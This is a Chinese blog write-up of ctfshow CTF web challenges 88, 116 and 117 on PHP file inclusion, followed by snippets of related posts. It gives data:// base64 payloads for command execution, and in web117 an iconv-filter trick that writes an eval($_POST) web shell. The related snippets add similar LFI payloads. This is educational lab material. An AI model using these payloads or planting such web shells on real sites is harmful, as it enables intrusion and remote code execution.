ctfshow学习记录-web入门(文件包含88&116-117)

已于 2022-08-11 14:34:43 修改
阅读量1.3k 收藏
点赞数 5
分类专栏: ctf-web # ctfshow-web 文章标签: 学习
于 2022-07-05 09:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_48780534/article/details/125424961
版权

目录

web88

解答:这次过滤的比较多,但是没有过滤:,可以使用php伪协议data。过滤了=,进行base64的时候需要把=去掉,它并不会影响前面字符的解码。
<?php system(ls);?>转base64:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKGxzKTs/Pg在这里插入图片描述最后cat读取flag。
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTs/Pg
在这里插入图片描述

web116

提示:misc+lfi
解答:提示说misc,和杂项有关。打开题目是一段视频,下载下来看看。
010Editor查看一下,发现了png。
在这里插入图片描述将png图片数据导出,发现图片是一段代码信息。分析可知需要file传参,如果不传参就会播放sp2.mp4的视频。
代码中的file_get_contents()可以直接读取文件。
在这里插入图片描述

获取flag,也没有给flag在哪的提示,所以就直接猜测当前目录下有flag文件:?file=flag.php

(页面信息以mp4显示,按理右击可以下载,但是也不知道什么问题点了下载没反应,所以最后就用burp抓包查看了。)
在这里插入图片描述

web117

解答:两个参数,有过滤,有die。
string字符串过滤器被过滤了,base64也被过滤了,但还有convert.iconv.

把一句话木马从UCS-2LE编码转换为UCS-2BE编码。

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[jz]);?>');
echo "payload:".$result."\n";
?>
#?<hp pe@av(l_$OPTSj[]z;)>?

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=jiuzhen.php
post:contents=?<hp pe@av(l_$OPTSj[]z;)>?

蚁剑连接,或者直接访问jiuzhen.php,post传参。
在这里插入图片描述

进一步学习

谈一谈php://filter的妙用

php://filter的各种过滤器

ctfshow+web入门文件包含
m0_59448417的博客
04-13 776
ctfshow+web入门文件包含
ctfshow-web入门-文件包含web78、web79、web80、web81)
m0_67403143的博客
12-23 794
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。的 base64 编码,也可以实现绕过。
CTFshow web入门——文件包含
小元砸的博客
02-07 4324
Web 78 &lt;?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 &lt;?p
ctfshow web入门文件包含
Blazing-Angel的博客
07-19 812
ctfshow
CTFshow——web入门——文件包含
h_adam的博客
10-24 4446
web入门——文件包含web78 web78 题目 &lt;?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 题解
ctfshow web入门 文件包含
qq_53063436的博客
11-05 229
把字符串 "Hello world!" 中的字符 "world" 替换为 "Shanghai": &lt;?php echo str_replace("world","Shanghai","Hello world!");?&gt; data:// 协议 条件:allow_url_fopen:on allow_url_include :on 用法:data://text/plain 即: http://127.0.0.1/include.ph...
ctfshow web151-161(文件上传一)
m0_74057302的博客
03-04 2208
我这一生如履薄冰,你说我还能到对岸吗???
2024年网安最全ctfshow-WEB-web3_ctfshow web3(1)
2401_84264583的博客
05-01 650
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag。很明显这个crf_go_go_go文件就是存放flag的文件。这一关的flag就存放在网站跟路径下的文件中。
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
2301_77578012的博客
05-23 1526
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5897
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
文件包含ctfshow web入门
qq_47168481的博客
11-17 3472
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
ctfshow web入门-文件包含
LYJ20010728的博客
06-23 545
ctfshow web入门-文件包含web78web79web80 web78 filter伪协议读取:?file=php://filter/read=convert.base64-encode/resource=flag.php,base64解码 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } web79 由于过滤了 p
ctfshow-web入门-文件包含
m0_74940843的博客
11-04 875
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
WEB-ctfshow入门文件包含
ing_end的博客
06-04 496
查看源码可以发现只能上传png图片 修改为php 修改上传格式为php,上传一句话马,蚁剑连接得flag 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。打开发现/upload下存在index.php文件,我们可以利用.user.ini, 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png 蚁剑连接得flag。 提示文件内容不合规,发现过滤了php,可使用短标签 蚁剑连接得f
CTFSHOW web入门 文件包含
羽的博客
04-28 3966
文章目录web78web79web80web81web82-86web87web88web116web117 web78 filter伪协议 payload file=php://filter/convert.base64-encode/resource=flag.php 解码后得到flag web79 data伪协议 payload file=data://text/plain,&lt;?=`tac f*`;?&gt; web80 远程文件包含 xxx为自己服务器地址 ?file=http://xxxx
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 927
文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctfshow-web入门-文件包含web82-web86)条件竞争实现session会话文件包含
web13093320398的博客
12-23 1132
file_get_contents 函数将会读取文件的全部内容并将其作为字符串返回,strpos($content, “
ctfshow学习记录-web入门文件包含78-87)
龟速更新的九某人
07-04 2416
ctfshow学习记录-web入门文件包含web78-87)
CTFSHOW-web-web4
最新发布
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = &quot;&#39; OR &#39;1&#39;=&#39;1&quot; data = {param: test_payload} response = requests.post(url, data=data) if &quot;Welcome&quot; in response.text: print(f&quot;[+] SQL Injection vulnerability detected on parameter &#39;{param}&#39;!&quot;) else: print(&quot;[-] No SQL Injection found.&quot;) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值